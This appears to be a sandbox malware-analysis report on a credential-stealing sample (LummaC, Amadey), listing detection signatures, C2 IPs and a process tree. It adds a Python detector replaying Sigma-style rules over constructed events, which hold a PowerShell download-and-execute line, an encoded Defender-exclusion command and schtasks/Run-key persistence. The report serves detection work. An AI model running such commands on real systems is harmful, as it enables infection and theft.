Threat name: LummaC, Amadey, Babadeda, LiteHTTP Bot
Alert
Classification: phis.troj.spyw.expl.evad
Signatures:
.NET source code references suspicious native API functions
Adds a directory exclusion to Windows Defender
AI detected suspicious sample
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
C2 URLs / IPs found in malware configuration
Detected unpacking (changes PE section rights)
Drops PE files to the document folder of the user
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
PE file contains section with special chars
PE file has nameless sections
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell download and execute file
Sigma detected: PowerShell DownloadFile
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: Suspicious MSHTA Child Process
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to download and execute files (via powershell)
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Amadeys stealer DLL
Yara detected LiteHTTP Bot
Yara detected LummaC Stealer
Yara detected obfuscated html page
Yara detected Poverty Stealer
Yara detected Powershell download and execute
Yara detected Vidar stealer
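Several of the signatures above are Sigma rules that fire on process-creation and registry telemetry (MSHTA child process, Base64-encoded MpPreference cmdlet, PowerShell DownloadFile, scheduled-task creation, new RUN key). The Python block below is an added example, not part of the sandbox report and not the published logic of any Sigma rule: it re-implements simplified versions of those rules and runs them over constructed events shaped like the chain in the behavior graph. The Event schema, the suspicious-folder and mshta-child lists, the registry path and every command line are assumptions made for the illustration; the report does not show the command lines the sample actually used.

```python
"""Added example: simplified replay of the report's Sigma-style signatures over constructed telemetry."""
from __future__ import annotations
import base64
import re
from dataclasses import dataclass

@dataclass
class Event:
    """One telemetry record; field names are an assumption for this example."""
    kind: str               # "process" (creation) or "registry" (value set)
    image: str = ""         # created process, full path
    parent_image: str = ""  # creating process, full path
    cmdline: str = ""
    target: str = ""        # registry value path (registry events only)
    details: str = ""       # registry value data (registry events only)

# Assumptions: user-writable folders a dropper favours, and interpreters mshta.exe should not spawn.
SUSPICIOUS_FOLDERS = ("\\appdata\\local\\temp\\", "\\temp\\", "\\users\\public\\",
                      "\\programdata\\", "\\windows\\temp\\", "\\appdata\\roaming\\")
MSHTA_CHILDREN = ("powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                  "rundll32.exe", "regsvr32.exe", "mshta.exe")
# -EncodedCommand and the abbreviations PowerShell accepts, followed by a Base64 blob.
ENC_RE = re.compile(r"(?i)[-/](?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})")

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def in_suspicious_folder(path: str) -> bool:
    return any(folder in path.lower() for folder in SUSPICIOUS_FOLDERS)

def decode_encoded_command(cmdline: str) -> str:
    """Return the UTF-16LE script behind -EncodedCommand, or '' when absent or malformed."""
    m = ENC_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le", errors="ignore")
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""

def effective_cmdline(ev: Event) -> str:
    """Raw command line plus whatever an encoded command decodes to."""
    return ev.cmdline + " " + decode_encoded_command(ev.cmdline)

def is_powershell(ev: Event) -> bool:
    return ev.kind == "process" and basename(ev.image) in ("powershell.exe", "pwsh.exe")

def rule_mshta_child(ev: Event) -> bool:
    return (ev.kind == "process" and basename(ev.parent_image) == "mshta.exe"
            and basename(ev.image) in MSHTA_CHILDREN)

def rule_encoded_mppreference(ev: Event) -> bool:
    return ev.kind == "process" and bool(
        re.search(r"(?i)(add|set)-mppreference", decode_encoded_command(ev.cmdline)))

def rule_defender_exclusion(ev: Event) -> bool:
    return ev.kind == "process" and bool(
        re.search(r"(?i)-mppreference\b.*-exclusionpath", effective_cmdline(ev)))

def rule_powershell_downloadfile(ev: Event) -> bool:
    return is_powershell(ev) and bool(re.search(
        r"(?i)downloadfile|downloadstring|invoke-webrequest|\biwr\b|start-bitstransfer",
        effective_cmdline(ev)))

def rule_powershell_download_execute(ev: Event) -> bool:
    return rule_powershell_downloadfile(ev) and bool(re.search(
        r"(?i)start-process|\bsaps\b|invoke-expression|\biex\b|invoke-item", effective_cmdline(ev)))

def rule_schtasks_suspicious(ev: Event) -> bool:
    cl = ev.cmdline.lower()
    if ev.kind != "process" or basename(ev.image) != "schtasks.exe" or "/create" not in cl:
        return False
    m = re.search(r'/tr\s+"?([^"]+)', cl)  # the task action
    action = m.group(1) if m else ""
    return in_suspicious_folder(action) or any(
        x in action for x in ("powershell", "mshta", "cmd /c", "wscript", "rundll32"))

def rule_run_key_suspicious(ev: Event) -> bool:
    return (ev.kind == "registry" and "\\currentversion\\run" in ev.target.lower()
            and in_suspicious_folder(ev.details))

RULES = {  # names mirror the signature titles in the report
    "Suspicious MSHTA Child Process": rule_mshta_child,
    "Powershell Base64 Encoded MpPreference Cmdlet": rule_encoded_mppreference,
    "Adds a directory exclusion to Windows Defender": rule_defender_exclusion,
    "PowerShell DownloadFile": rule_powershell_downloadfile,
    "Powershell download and execute file": rule_powershell_download_execute,
    "Suspicious Command Patterns In Scheduled Task Creation": rule_schtasks_suspicious,
    "New RUN Key Pointing to Suspicious Folder": rule_run_key_suspicious,
}

def evaluate(events: list[Event]) -> list[tuple[int, str]]:
    """Return (event index, rule name) for every rule that fires."""
    return [(i, name) for i, ev in enumerate(events) for name, rule in RULES.items() if rule(ev)]

def encode_command(script: str) -> str:
    """Encode a script the way powershell -EncodedCommand expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

PS, SYS, TEMP = (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\System32", r"C:\Users\user\AppData\Local\Temp")
DROPPED = TEMP + r"\483d2fa8a0d53818306efeb32d3.exe"
# Constructed events modelled on the chain in the behavior graph; the report does not show the real command lines.
SAMPLE_EVENTS = [
    Event("process", SYS + r"\mshta.exe", SYS + r"\cmd.exe", r"mshta C:\Temp\random.hta"),
    Event("process", PS, SYS + r"\mshta.exe", "powershell -w hidden -c \"(New-Object Net.WebClient)"
          f".DownloadFile('http://example.invalid/random.exe','{DROPPED}'); Start-Process '{DROPPED}'\""),
    Event("process", PS, TEMP + r"\eXbhgU9.exe", "powershell -NoProfile -ExecutionPolicy Bypass -EncodedCommand "
          + encode_command(r"Add-MpPreference -ExclusionPath 'C:\YQNZByFp'")),
    Event("process", SYS + r"\schtasks.exe", SYS + r"\cmd.exe",
          f'schtasks /create /f /sc minute /mo 1 /tn "skotes" /tr "{TEMP}\\skotes.exe"'),
    Event("registry", target=r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\skotes", details=TEMP + r"\skotes.exe"),
    Event("process", SYS + r"\conhost.exe", SYS + r"\cmd.exe", r"\??\C:\Windows\system32\conhost.exe 0x4"),
]

if __name__ == "__main__":
    for idx, name in evaluate(SAMPLE_EVENTS):
        print(f"event {idx}: {name}")
```

Running the file prints which rule fired on which constructed event. The point worth noticing is the third event: nothing in its raw command line mentions Defender, so the exclusion is only caught because the detector decodes -EncodedCommand (and its -enc/-ec/-e spellings) before matching, which is exactly the gap the "Base64 Encoded MpPreference Cmdlet" signature exists to close. The benign conhost.exe event and the cmd.exe-launched mshta.exe produce no hits, so a real deployment would still want a rule for mshta.exe executing an .hta from a temp folder.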
Behavior Graph
ID: 1582701
Sample: 5EfYBe3nch.exe
Startdate: 31/12/2024
Architecture: WINDOWS
Score: 100

The graph is reproduced below as a process tree. Each process lists the signatures attached to it, the network endpoints it contacted (IP, AS name, country) and the files it dropped; "N other ..." entries are collapsed in the original graph and are kept as they appear there. Bracketed node numbers are the graph's own node IDs, and "count N" is the small number shown on that node in the original graph.

5EfYBe3nch.exe [node 2, the submitted sample]
  signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 30 other signatures
  started:
    5EfYBe3nch.exe [node 10]
      network: 185.215.113.16 (WHOLESALECONNECTIONSNL, Portugal); 104.21.96.1 (CLOUDFLARENETUS, United States)
      dropped: C:\Users\user\...\DLTDCR8UJINP8YM8Y.exe (PE32); C:\Users\...\31FYMQUCQX14ZVCZU2HAYNV7V.exe (PE32)
      signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Query firmware table information (likely to detect VMs); Found many strings related to Crypto-Wallets (likely being stolen); 4 other signatures
      started:
        DLTDCR8UJINP8YM8Y.exe [node 21, count 36]
          network: 185.215.113.206 (WHOLESALECONNECTIONSNL, Portugal); 127.0.0.1 (unknown, unknown)
          dropped: C:\Users\user\Documents\GIIIIJDHJE.exe (PE32); C:\Users\user\AppData\...\softokn3[1].dll (PE32); C:\Users\user\AppData\Local\...\random[1].exe (PE32); 11 other files (7 malicious)
          signatures: Detected unpacking (changes PE section rights); Attempt to bypass Chrome Application-Bound Encryption; Drops PE files to the document folder of the user; 7 other signatures
          started:
            cmd.exe [node 42, count 1]
              signatures: Uses schtasks.exe or at.exe to add and modify task schedules
              started:
                GIIIIJDHJE.exe [node 63, count 2]
                  signatures: Detected unpacking (changes PE section rights); Tries to evade debugger and weak emulator (self modifying code); Hides threads from debuggers
                  started:
                    skotes.exe [node 83]
                      signatures: Hides threads from debuggers; Tries to detect sandboxes / dynamic malware analysis system (registry check); Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                conhost.exe [node 66]
            chrome.exe [node 45]
              network: 192.168.2.4 (unknown, unknown); 239.255.255.250 (unknown, Reserved)
              signatures: Suspicious execution chain found
              started:
                chrome.exe [node 68]
                  network: 142.250.184.206 (GOOGLEUS, United States); 142.250.185.195 (GOOGLEUS, United States); 8 other IPs or domains
        31FYMQUCQX14ZVCZU2HAYNV7V.exe [node 26, count 4]
          dropped: C:\Users\user\AppData\Local\...\skotes.exe (PE32)
          signatures: Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors); 2 other signatures
          started:
            skotes.exe [node 48]
              signatures: Detected unpacking (changes PE section rights); Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors); Tries to evade debugger and weak emulator (self modifying code); 3 other signatures
    skotes.exe [node 15]
      network: 185.215.113.43 (WHOLESALECONNECTIONSNL, Portugal); 104.18.10.31 (CLOUDFLARENETUS, United States); 31.41.244.11 (AEROEXPRESS-ASRU, Russian Federation)
      dropped: C:\Users\user\AppData\...\36ac23ea9d.exe (PE32); C:\Users\user\AppData\Local\...\av3EZhq.exe (PE32+); C:\Users\user\AppData\Local\Temp\...\am.exe (PE32); 12 other malicious files
      signatures: Hides threads from debuggers; Tries to detect sandboxes / dynamic malware analysis system (registry check); Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
      started:
        eXbhgU9.exe [node 28]
          network: 140.82.121.3 (GITHUBUS, United States); 185.199.109.133 (FASTLYUS, Netherlands)
          dropped: C:\YQNZByFp\jyidkjkfhjawd.exe (PE32)
          signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Adds a directory exclusion to Windows Defender
          started:
            4 other processes [node 57]
              network: 172.67.179.160 (CLOUDFLARENETUS, United States)
              signatures: Multi AV Scanner detection for dropped file; Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Query firmware table information (likely to detect VMs); 5 other signatures
              started:
                2 other processes [node 77]
        cmd.exe [node 30]
          started:
            cmd.exe [node 50]
              dropped: C:\Temp\QZ7iCUD92.txt (HTML); C:\Temp\.gif (HTML)
              started:
                mshta.exe [node 71]
                  signatures: Suspicious powershell command line found; Tries to download and execute files (via powershell)
                  started:
                    powershell.exe [node 86]
                      dropped: C:\Users\...\483d2fa8a0d53818306efeb32d3.exe (PE32)
                      started:
                        483d2fa8a0d53818306efeb32d3.exe [node 101]
                          signatures: Detected unpacking (changes PE section rights); Tries to detect sandboxes and other dynamic analysis tools (window names); Tries to evade debugger and weak emulator (self modifying code); 3 other signatures
                        conhost.exe [node 104]
                5 other processes [node 73]
                  started:
                    powershell.exe [node 89]
                    powershell.exe [node 91]
            conhost.exe [node 53]
        iSHmPkn.exe [node 32]
          network: 185.244.212.106 (M247GB, Romania)
          signatures: Antivirus detection for dropped file; 2 other signatures
    cmd.exe [node 17]
      dropped: C:\Temp\random.hta (HTML)
      signatures: Creates HTA files
      started:
        2 other processes [node 38]
          signatures: Suspicious powershell command line found; Tries to download and execute files (via powershell)
          started:
            powershell.exe [node 55]
              started:
                2 other processes [node 75]
                  signatures: Tries to detect sandboxes / dynamic malware analysis system (registry check); Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
    3 other processes [node 19]
      started:
        cmd.exe [node 34]
          dropped: C:\Temp\8tA3oGhlP.txt (HTML)
          started:
            6 other processes [node 59]
              started:
                3 other processes [node 79]
                  started:
                    483d2fa8a0d53818306efeb32d3.exe [node 93]
                    conhost.exe [node 95]
        cmd.exe [node 36]
          dropped: C:\Temp122LqFjPikt.txt (HTML)
          started:
            6 other processes [node 61]
              signatures: Suspicious powershell command line found; Tries to download and execute files (via powershell)
              started:
                3 other processes [node 81]
                  started:
                    483d2fa8a0d53818306efeb32d3.exe [node 97]
                    conhost.exe [node 99]
        2 other processes [node 40]